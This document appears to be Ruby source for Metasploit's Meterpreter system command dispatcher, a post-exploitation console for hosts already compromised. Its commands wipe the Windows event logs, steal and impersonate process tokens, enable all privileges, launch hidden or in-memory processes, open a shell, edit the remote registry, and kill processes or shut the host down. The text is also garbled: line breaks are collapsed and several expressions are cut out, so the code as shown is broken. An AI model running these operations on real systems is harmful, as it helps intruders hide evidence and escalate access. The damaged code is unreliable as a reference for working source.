require 'rex/post/meterpreter' module Rex module Post module Meterpreter module Ui ### # # The system level portion of the standard API extension. # ### class Console::CommandDispatcher::Stdapi::Sys Klass = Console::CommandDispatcher::Stdapi::Sys include Console::CommandDispatcher # # Options used by the 'execute' command. # @@execute_opts = "-a" => [ true, "The arguments to pass to the command." ], "-c" => [ false, "Channelized I/O (required for interaction)." ], "-f" => [ true, "The executable command to run." ], "-h" => [ false, "Help menu." ], "-H" => [ false, "Create the process hidden from view." ], "-i" => [ false, "Interact with the process after creating it." ], "-m" => [ false, "Execute from memory." ], "-d" => [ true, "The 'dummy' executable to launch when using -m." ], "-t" => [ false, "Execute process with currently impersonated thread token"], "-k" => [ false, "Execute process on the meterpreters current desktop" ], "-s" => [ true, "Execute process in a given session as the session user" ]) # # Options used by the 'reg' command. # @@reg_opts = "-d" => [ true, "The data to store in the registry value." ], "-h" => [ false, "Help menu." ], "-k" => [ true, "The registry key path (E.g. HKLM\\Software\\Foo)." ], "-t" => [ true, "The registry value type (E.g. REG_SZ)." ], "-v" => [ true, "The registry value name (E.g. Stuff)." ], "-r" => [ true, "The remote machine name to connect to (with current process credentials" ], "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ]) # # List of supported commands. # def commands { "clearev" => "Clear the event log", "execute" => "Execute a command", "getpid" => "Get the current process identifier", "getuid" => "Get the user that the server is running as", "getprivs" => "Attempt to enable all privileges available to the current process", "kill" => "Terminate a process", "ps" => "List running processes", "reboot" => "Reboots the remote computer", "reg" => "Modify and interact with the remote registry", "rev2self" => "Calls RevertToSelf() on the remote machine", "sysinfo" => "Gets information about the remote system, such as OS", "shell" => "Drop into a system command shell", "shutdown" => "Shuts down the remote computer", "steal_token" => "Attempts to steal an impersonation token from the target process", "drop_token" => "Relinquishes any active impersonation token.", } end # # Name for this dispatcher. # def name "Stdapi: System" end # # Executes a command with some options. # def cmd_execute(*args) if (args.length == 0) args.unshift("-h") end session = nil interact = false desktop = false channelized = nil hidden = nil from_mem = false dummy_exec = "cmd" cmd_args = nil cmd_exec = nil use_thread_token = false @@execute_opts.parse(args) { |opt, idx, val| case opt when "-a" cmd_args = val when "-c" channelized = true when "-f" cmd_exec = val when "-H" hidden = true when "-m" from_mem = true when "-d" dummy_exec = val when "-k" desktop = true when "-h" print( "Usage: execute -f file [options]\n\n" + "Executes a command on the remote machine.\n" + @@execute_opts.usage) return true when "-i" channelized = true interact = true when "-t" use_thread_token = true when "-s" session = val.to_i end } # Did we at least get an executable? if (cmd_exec == nil) print_error("You must specify an executable file with -f") return true end # Execute it p = client.sys.process.execute(cmd_exec, cmd_args, 'Channelized' => channelized, 'Desktop' => desktop, 'Session' => session, 'Hidden' => hidden, 'InMemory' => (from_mem) ? dummy_exec : nil, 'UseThreadToken' => use_thread_token) print_line("Process #{} created.") print_line("Channel #{} created.") if ( if (interact and shell.interact_with_channel( end end # # Drop into a system shell as specified by %COMSPEC% # def cmd_shell(*args) path = client.fs.file.expand_path("%COMSPEC%") path = (path and not path.empty?) ? path : "cmd.exe" cmd_execute("-f", path, "-c", "-H", "-i", "-t") end # # Gets the process identifier that meterpreter is running in on the remote # machine. # def cmd_getpid(*args) print_line("Current pid: #{client.sys.process.getpid}") return true end # # Displays the user that the server is running as. # def cmd_getuid(*args) print_line("Server username: #{client.sys.config.getuid}") end # # Clears the event log # def cmd_clearev(*args) logs = ['Application', 'System', 'Security'] logs << args logs.flatten! logs.each do |name| log = print_status("Wiping #{log.length} records from #{name}...") log.clear end end # # Kills one or more processes. # def cmd_kill(*args) if (args.length == 0) print_line( "Usage: kill pid1 pid2 pid3 ...\n\n" + "Terminate one or more processes.") return true end print_line("Killing: #{args.join(", ")}") client.sys.process.kill(*( { |x| x.to_i })) return true end # # Lists running processes. # def cmd_ps(*args) processes = client.sys.process.get_processes tbl = 'Header' => "Process list", 'Indent' => 1, 'Columns' => [ "PID", "Name", "Arch", "Session", "User", "Path" ]) processes.each { |ent| session = ent['session'] == 0xFFFFFFFF ? '' : ent['session'].to_s arch = ent['arch'] # for display and consistency with payload naming we switch the internal 'x86_64' value to display 'x64' if( arch == ARCH_X86_64 ) arch = "x64" end tbl << [ ent['pid'].to_s, ent['name'], arch, session, ent['user'], ent['path'] ] } if (processes.length == 0) print_line("No running processes were found.") else print("\n" + tbl.to_s + "\n") end return true end # # Reboots the remote computer. # def cmd_reboot(*args) print_line("Rebooting...") client.sys.power.reboot end # # Modifies and otherwise interacts with the registry on the remote computer # by allowing the client to enumerate, open, modify, and delete registry # keys and values. # def cmd_reg(*args) # Extract the command, if any cmd = args.shift if (args.length == 0) args.unshift("-h") end # Initiailze vars key = nil value = nil data = nil type = nil wowflag = 0x0000 rem = nil @@reg_opts.parse(args) { |opt, idx, val| case opt when "-h" print_line( "Usage: reg [command] [options]\n\n" + "Interact with the target machine's registry.\n" + @@reg_opts.usage + "COMMANDS:\n\n" + " enumkey Enumerate the supplied registry key [-k ]\n" + " createkey Create the supplied registry key [-k ]\n" + " deletekey Delete the supplied registry key [-k ]\n" + " queryclass Queries the class of the supplied key [-k ]\n" + " setval Set a registry value [-k -v -d ]\n" + " deleteval Delete the supplied registry value [-k -v ]\n" + " queryval Queries the data contents of a value [-k -v ]\n\n") return false when "-k" key = val when "-v" value = val when "-t" type = val when "-d" data = val when "-r" rem = val when "-w" if val == '64' wowflag = KEY_WOW64_64KEY elsif val == '32' wowflag = KEY_WOW64_32KEY end end } # All commands require a key. if (key == nil) print_error("You must specify a key path (-k)") return false end # Split the key into its parts root_key, base_key = client.sys.registry.splitkey(key) begin # Rock it case cmd when "enumkey" open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_READ + wowflag) end end print_line( "Enumerating: #{key}\n") keys = open_key.enum_key vals = open_key.enum_value if (keys.length > 0) print_line(" Keys (#{keys.length}):\n") keys.each { |subkey| print_line("\t#{subkey}") } print_line end if (vals.length > 0) print_line(" Values (#{vals.length}):\n") vals.each { |val| print_line("\t#{}") } print_line end if (vals.length == 0 and keys.length == 0) print_line("No children.") end when "createkey" open_key = nil if not rem open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.create_key(base_key, KEY_WRITE + wowflag) end end print_line("Successfully created key: #{key}") when "deletekey" open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_WRITE + wowflag) end end open_key.delete_key(base_key) print_line("Successfully deleted key: #{key}") when "setval" if (value == nil or data == nil) print_error("You must specify both a value name and data (-v, -d).") return false end type = "REG_SZ" if (type == nil) open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_WRITE + wowflag) end end open_key.set_value(value, client.sys.registry.type2str(type), data) print_line("Successful set #{value}.") when "deleteval" if (value == nil) print_error("You must specify a value name (-v).") return false end open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_WRITE + wowflag) end end open_key.delete_value(value) print_line("Successfully deleted #{value}.") when "queryval" if (value == nil) print_error("You must specify a value name (-v).") return false end open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_READ + wowflag) end end v = open_key.query_value(value) print( "Key: #{key}\n" + "Name: #{}\n" + "Type: #{v.type_to_s}\n" + "Data: #{}\n") when "queryclass" open_key = nil if not rem open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + wowflag) else remote_key = client.sys.registry.open_remote_key(rem, root_key) if remote_key open_key = remote_key.open_key(base_key, KEY_READ + wowflag) end end data = open_key.query_class print("Data: #{data}\n") else print_error("Invalid command supplied: #{cmd}") end ensure open_key.close if (open_key) end end # # Calls RevertToSelf() on the remote machine. # def cmd_rev2self(*args) client.sys.config.revert_to_self end def cmd_getprivs_help print_line "Usage: getprivs" print_line print_line "Attempt to enable all privileges, such as SeDebugPrivilege, available to the" print_line "current process. Note that this only enables existing privs and does not change" print_line "users or tokens." print_line print_line "See also: steal_token, getsystem" print_line end # # Obtains as many privileges as possible on the target machine. # def cmd_getprivs(*args) if args.include? "-h" cmd_getprivs_help end print_line("=" * 60) print_line("Enabled Process Privileges") print_line("=" * 60) client.sys.config.getprivs.each do |priv| print_line(" #{priv}") end print_line("") end # # Tries to steal the primary token from the target process. # def cmd_steal_token(*args) if(args.length != 1 or args[0] == "-h") print_error("Usage: steal_token [pid]") return end print_line("Stolen token with username: " + client.sys.config.steal_token(args[0])) end # # Drops any assumed token. # def cmd_drop_token(*args) print_line("Relinquished token, now running as: " + client.sys.config.drop_token()) end # # Displays information about the remote system. # def cmd_sysinfo(*args) info = client.sys.config.sysinfo width = "Meterpreter".length info.keys.each { |k| width = k.length if k.length > width and info[k] } info.each_pair do |key, value| print_line("#{key.ljust(width+1)}: #{value}") if value end print_line("#{"Meterpreter".ljust(width+1)}: #{client.platform}") return true end # # Shuts down the remote computer. # def cmd_shutdown(*args) print_line("Shutting down...") client.sys.power.shutdown end end end end end end